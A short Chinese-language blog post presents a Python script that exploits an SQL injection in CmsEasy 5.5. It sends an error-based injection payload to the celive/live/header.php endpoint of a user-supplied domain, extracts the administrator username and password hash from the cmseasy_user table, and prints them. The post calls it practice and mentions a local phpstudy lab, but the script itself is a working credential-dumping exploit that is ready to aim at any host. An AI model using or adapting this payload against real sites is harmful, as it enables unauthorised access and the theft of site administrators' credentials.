最近在提高自己編程能力,拿一些實用的小工具練下。該腳本為python語言,主要涉及模塊urllib,re。
功能:驗證CmsEasy5.5爆賬號密碼
實驗用源碼:http://pan.baidu.com/s/1i4lAwBF
搭建環境:phpstudy 試了IIs+php沒爆出來最好用phpstudy。
通過瀏覽器訪問確認存在漏洞存在。
用python來實現。
import urllib.request import urllib.parse import re domain = input('請輸入域名或ip(example:www.xx.com/xxx.xxx.xx):') url = 'http://%s/cmseasy/celive/live/header.php' %(domain) data = { 'xajax':"LiveMessage", 'xajaxargs[0][name]':"1',(SELECT 1 FROM " "(select count(*),concat(floor(rand(0)*2)," "(select concat(username,0x23,password,md5(123)) " "from cmseasy_user where groupid=2 limit 1))a " "from information_schema.tables group by a)b)," "'','','','1','127.0.0.1','2')#" } data = urllib.parse.urlencode(data).encode('utf-8') #將要post的數據進行編碼 try: req = urllib.request.Request(url,data) #get請求不需要寫data參數,post需要把data參數寫上 response = urllib.request.urlopen(req) html = response.read().decode('utf-8') if re.findall(r'a801fc3202cb962ac59075b964b07152',html): print("%s is vulnerable"%(url)) html2 = re.findall(r'(?<=entry \'1).*(?=a801fc3202cb962ac59075b964b07152)',html) #通過正則將賬號密碼匹配出來 print(html2) except Exception as err: print('Not Found')
